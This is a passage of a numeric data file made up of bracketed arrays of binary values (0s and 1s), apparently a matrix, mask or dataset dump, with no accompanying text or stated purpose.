,0,1,0,0,0,0,1,0,0,0,1,1,0,0,1,0,0,1,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,1,0,1,1,0,1,0,0,1,0,1,0,0,1,0,0,1,0,1,0,0,1,0,1,0,0,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,0,1,0,0,1,1,1,0,1,0,0,1,1,0,0,1,0,0,1,1,0,1,1,0,1,1,1,1,0,1,1,0,0,0,1,1,0,0,0,1,1,0,0,1,1,0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,0,1,0,0,1,1,1],[0,0,0,0,0,1,0,1,1,0,0,0,1,1,0,1,0,0,0,0,1,0,0,0,0,1,0,1,1,1,0,0,1,0,1,1,0,0,1,1,0,0,1,0,1,0,0,0,1,0,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,0,0,1,1,1,0,1,1,0,0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,1,0,1,1,1,1,1,0,0,1,1,1,1,1,0,1,1,0,1,0,0,0,1,1,1,0,1,0,1,0,0,0,1,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,1,1,1,1,0,1,0,1,0,1,0],[0,1,1,0,1,0,1,0,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,0,1,0,0,0,1,1,1,0,1,0,0,1,1,0,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,0,0,0,0,1,1,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,1,1,1,0,1,1,1,0,0,0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,0,0,0,0,1,0,0,0,1,1,0,1,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,1,1,0,1,1,1,1,0,0,1,0,0,0,1,1,1,0,1,1,0,1,1,1,1,1,1,0,1,0],[1,0,1,1,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,0,1,1,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,1,1,0,1,0,1,1,1,0,0,1,1,0,1,0,0,1,0,0,1,1,0,1,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,1,0,1,0,0,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,0,0,1,1,0,1,1,1,0,1,1,0,1,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,0,1,0,1,1,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,1,1,1,1],[0,0,0,0,1,0,0,0,1,1,1,0,0,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,0,0,1,1,0,1,0,0,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1,1,0,0,0,0,1,1,0,1,1,0,0,0,0,1,0,0,1,1,0,1,0,1,1,0,1,0,1,1,0,0,1,1,0,1,0,1,1,0,1,0,1,0,0,0,0,1,0,0,0,0,1,1,1,0,1,0,1,1,0,0,1,1,1,0,0,0,1,0,0,0,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,1,0,0],[0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,1,0,1,1,0,1,1,1,0,1,0,1,1,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,1,0,1,1,0,1,0,0,0,1,1,1,1,1,0,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,1,1,1,0,1,0,0,1,0,1,1,1,1,0,1,0,1,1,1,1,1,0,1,0,0,1,0,0,1,1,0,1,1,1,1,0,1,0,1,0,1,1,0,1,0,1,1,1,0,0,0,1,0,0,0,1,1,1,1,0,1,0,0,1,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,0,0,1,0,1],[1,0,1,0,1,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,1,1,0,1,0,0,1,0,0,0,1,1,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,1,1,0,0,0,1,0,1,0,1,1,0,1,1,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,1,1,0,0,0,1,0,1,1,0,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,1,1,1,0,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,1,1,1,0,0,0,0,0,1,1,1,0,1,1,1,0,1,1,0,1,0,0,1,0,0,1,0,1,1,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,0,1,1,0,0,0,0],[1,1,0,1,0,0,1,0,0,1,0,0,0,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,1,1,1,0,0,1,0,0,1,0,1,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,1,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,1,1,0,1,1,0,0,1,1,1,0,0,1,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,1,0,0,0,0],[0,1,1,0,0,1,1,1,1,0,1,0,1,1,1,1,1,0,1,1,0,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,0,1,0,0,1,0,1,0,0,0,1,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1,0,1,0,1,0,1,1,1,0,0,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,0,1,0,1,0,0,1,1,0,0,0,0,1,1,1,0,1,1,1,1,1,0,1,0,0,0,1,1,1,0,0,0,1,1,1,1,0,0,1,0,1,1,0,0,0,1,0,0,1,0,0,1,0,1,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,1,0,0,0,0,1,1,1,1,0,1],[1,0,1,0,0,1,0,1,1,1,1,0,0,0,1,1,0,1,0,0,1,0,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,1,1,0,1,0,0,0,0,1,1,1,0,1,0,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,1,1,0,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,1,1,1,1,0,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,1,1,0,0,1,1,0,1,1,0,0],[0,0,1,1,1,0,0,1,1,0,1,0,1,1,0,0,1,1,0,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,0,1,0,1,1,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,0,1,0,0,0,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,0,1,0,0,0,1,1,0,1,1,0,0,0,1,0,1,1,0,0,0,0,1,0,1,0,1,1,0,0,1,0,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,1,0,0,1,0,0,1,0,0,1,1,0,1,1,1,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,0,0,0,0,1,0,0,1,0,0,1,1,1,1,0,1,1,0],[1,0,1,1,1,1,1,1,1,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,0,0,1,1,0,0,1,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,1,1,0,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,1,1,0,1,1,1,1,0,0,0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,0,1,1,1,0,0,1,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,1,0,1,1,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,1,1,1,1,1,1,1,0,0,1,0,0,1,0,1,0,1,1,1,1,0,0,1,1,0,0,0,1,0,1,0,0,1,0,0],[0,1,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,0,1,0,1,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,0,1,1,1,1,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,0],[0,0,1,1,1,0,0,0,1,0,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,0,0,0,1,0,1,1,1,0,1,0,0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,1,0,0,1,1,1,1,1,1,1,1,1,0,0,1,0,1,1,0,1,0,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,0,1,0,1,1,0,1,1,1,1,0,1,0,1,1,0,0,1,0,0,1,1,0,1,1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,1,0,0,0,1],[0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,1,0,1,1,0,1,0,0,0,1,1,1,0,0,1,0,1,0,1,0,0,0,1,1,0,0,1,1,0,0,0,1,0,1,0,0,0,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,0,0,0,0,1,1,0,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0,0,0,0,1,1,1,1,0,1,1,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,1,1,1,1,0,0,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,1,1,1,0,1,1,1,0,0,1,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0],[1,1,1,0,1,1,0,0,0,1,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,1,0,1,0,0,1,1,1,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,1,0,1,0,1,1,0,0,1,1,0,1,1,0,0,0,1,0,1,1,0,0,0,0,1,1,1,1,0,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,1,0,1,1,0,1,1,1,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,1,0,0,1,1,1,0,1,0,0,0,0,0,1,1],[1,0,1,1,1,1,0,1,0,0,1,1,0,0,0,0,0,1,1,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,0,1,1,1,0,0,1,1,0,0,0,1,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,1,0,1,1,0,1,1,0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,1,0,1,0,1,0,1,1,1,0,1,1,0,1,1,1,1,1,1,0],[0,0,0,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,0,1,0,0,0,1,1,0,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,0,1,0,0,1,1,0,1,1,0,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,1,0,1,1,1,0,1,0,1,0,0,0,1,0,1,1,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,0,1,1],[0,1,1,1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,0,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,1,1,1,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,1,1,1,1,0,1,0,1,1,0,1,1,0,1,0,1,0,0,0,1,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,1,1,1,1,1,1,1,1,0,1,0,1,0,0,0,0,1,0,0,0,1,1,0,0,0,0,1,1,1],[0,1,0,0,0,0,1,0,0,0,0,1,1,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,1,1,1,0,1,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,1,0,1,0,0,0,1,0,0,1,1,0,1,0,0,0,1,0,0,0,1,1,1,0,1,0,1,0,0,1,1,0,1,0,0,1,0,1,1,0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,0,1,1,1,0,0,0,1,0,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,1,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,0,1,1,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,0,0,1,0,1,0,1,1,1,1,0,0,1,0,0,0,1,0,0,1,0,1,1,1,0,0,1,1,0,1,0,0,1,1],[1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,1,0,1,0,0,0,0,1,1,0,0,1,0,0,1,1,0,0,1,1,0,0,0,1,0,0,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,1,1,1,0,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,1,1,0,1,0,1,0,0,0,0,0,1,1,0,1,1,0,0,1,1,0,0,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,0,0,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,1,1,0,0,1,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,0,0,0,0,1,1,1,1,1,1,1],[1,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,1,0,0,0,0,1,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,0,0,0,1,0,1,0,0,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,0,1,1,1,0,0,0,1,1,1,1,0,0,0,1,1,1,1,0,0,1,0,0,0,1,1,0,1,0,1,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,1,0,0,0,0,1,1,1],[0,0,1,0,1,0,1,1,1,1,0,1,1,0,1,1,1,0,1,1,1,1,1,1,1,0,0,1,0,0,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,0,0,0,1,0,0,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,0,0,1,1,0,0,0,1,1,0,1,1,0,0,0,1,1,1,1,1,0,0,0,1,0,0,1,0,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,0,0,1,1,1],[0,1,0,0,0,0,0,1,0,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,1,0,1,0,0,0,0,1,1,1,0,1,0,1,0,1,1,1,0,1,1,1,1,0,0,1,0,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,1,0,0,1,1,0,0,0,1,1,0,0,0,0,0,0,1,0,1,1,0,1,0,0,1,0,1,1,1,1,0,0,0,0,1,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,1,0,1,1,0,1,0,1,0,0,0,1,0,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,1,0,0,0,1,0,1,1,1,1,1,0,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,1,0,1,1,0,0,0,0,1,1,1,1,0,0,0,0,1,0,0,0,1],[1,0,1,1,1,0,1,1,0,1,0,1,1,0,0,1,1,1,0,0,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,0,1,0,0,0,1,1,0,1,1,1,0,1,1,0,1,0,1,0,0,1,0,1,1,0,1,1,0,0,1,0,1,0,1,1,0,1,0,0,1,0,1,0,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,1,1,0,1,0,0,0,0,1,1,1,1,0,0,0,1,1,1,0,0,0,1,0,1,0,1,1,0,1,0,0,1,1,0,0,0,0,0,1,1,1,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1],[0,1,0,1,1,0,0,1,0,1,0,1,0,0,1,1,0,1,1,1,1,0,0,1,0,1,1,1,0,0,0,1,1,0,1,1,0,1,0,1,1,1,0,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,1,1,1,0,1,1,0,1,1,1,0,0,1,0,1,0,1,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,1,0,1,1,0,1,1,1,0,0,0,1,1,0,1,0,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,1,1,1,1,1,1,0,1,1,1,0,1,0,1,0,0,0,0,1,1,1,0,0,0,1,1,0,0,0,1,0,0,0,1,0,1,0,1,1],[0,1,1,0,1,1,1,1,0,1,1,0,1,0,0,0,1,0,1,0,0,1,0,0,1,1,0,0,1,1,0,1,1,0,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,1,1,0,1,0,0,0,1,0,1,1,0,0,0,1,0,0,0,1,1,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,1,1,1,0,0,1,0,0,1,0,1,1,0,0,1,0,1,0,1,0,1,0,1,1,1,0,0,0,0,0,0,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,1,1,1,0,1,0,1,1,1,1,1,1,0,0,0,1,1,0,1,0,1,1,1,0,0,0,0,1,0,1,1,1,1,0,1,1,0,0,1,0,1,0,1,1,0,1,1,1,0,0,1,0,1,1,0,1,1,1,1,0],[1,1,0,0,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0,1,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,0,0,1,1,0,0,1,0,1,1,1,0,0,0,0,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,1,1,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,1,1,1,0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,1,1,1,1,1,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,1,1,1,1,1,0,1,1,0,1,0,1,1,1,1,0,0,0],[1,1,1,1,1,1,0,1,1,1,0,1,0,0,1,1,0,1,0,1,0,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,0,0,0,1,0,1,0,0,1,1,1,0,1,0,1,0,0,1,0,0,1,1,1,0,0,0,0,1,1,0,0,1,0,0,0,0,1,0,0,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,1,0,0,1,1,1,0,0],[0,1,1,1,0,0,1,1,1,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,0,1,0,0,1,0,0,1,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,1,1,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,1,0,1,1,0,0,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,0,1,1,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,0,1,0,1,0,1],[0,1,0,1,0,0,1,0,1,0,1,1,1,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,1,1,0,0,0,1,1,0,1,1,0,0,0,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,0,0,1,1,1,1,1,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,1,1,1,0,0,0,0,0,1,0,1,1,0,0,0,1,1,0,0,0,1,0,1,1,1,1,1,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,1,1,1,1,1,0,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,1,0,0,1,0,0,0,1,1,1,1,0,0,1,0,0,1,1,1,0,0,0,1,0,1,0,1,0,1,1,1,1,0,1,0,1,1,0,0,1,0,1,0,0,0,0,0,1,1,0,0,1],[0,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,0,1,1,0,0,1,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,1,1,1,0,1,0,1,0,0,1,0,0,0,0,0,1,1,1,1,1,0,1,1,1,1,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,1,1,1,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,1,1,0,1,1,0,1,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,0,1,1,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,0,0,1,0],[1,1,0,1,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,1,1,0,0,0,0,1,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,1,1,1,0,0,1,1,0,1,1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,0,1,0,1,1,0,1,1,0,0,1,1,0,1,0,1,0,1,1,0,1,0,0,1,1,1,0,1,0,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,0,0,1],[1,1,0,0,0,0,0,1,1,1,0,0,1,1,1,0,0,0,0,0,1,0,1,1,0,0,1,0,0,1,1,0,1,0,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,1,0,0,0,0,1,0,0,1,0,1,1,1,1,0,1,0,0,1,0,1,0,0,0,1,1,0,1,1,0,1,0,0,1,0,1,1,1,1,1,1,0,0,1,0,1,0,0,1,0,1,1,0,1,0,1,0,0,0,1,0,1,0,0,0,1,1,0,1,0,1,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1,1,0,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,0,1,1,0,1,1],[1,0,0,0,1,1,0,1,0,1,1,0,0,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,1,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,0,1,1,0,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,0,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,0,1,0,1,1,1,1,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,0,1,1,0,0,0,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,1,1,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,1,1,1,0,1,1,0,1,0,1,1,1,0,0,0,0,0,0,1,1,1],[0,1,0,1,0,0,1,1,0,1,0,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,0,0,1,0,0,1,0,1,1,0,0,1,0,1,1,0,1,0,0,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,0,0,0,1,0,1,0,0,1,1,0,1,0,0,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,0,0,0,1,1,0],[0,0,1,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,0,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,1,1,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,1,1,1,1,1,0,0,0,1,0,1,1,0,1,1,1,0,0,0,1,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,1,0,1,1,0,0,1,0,1,0,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0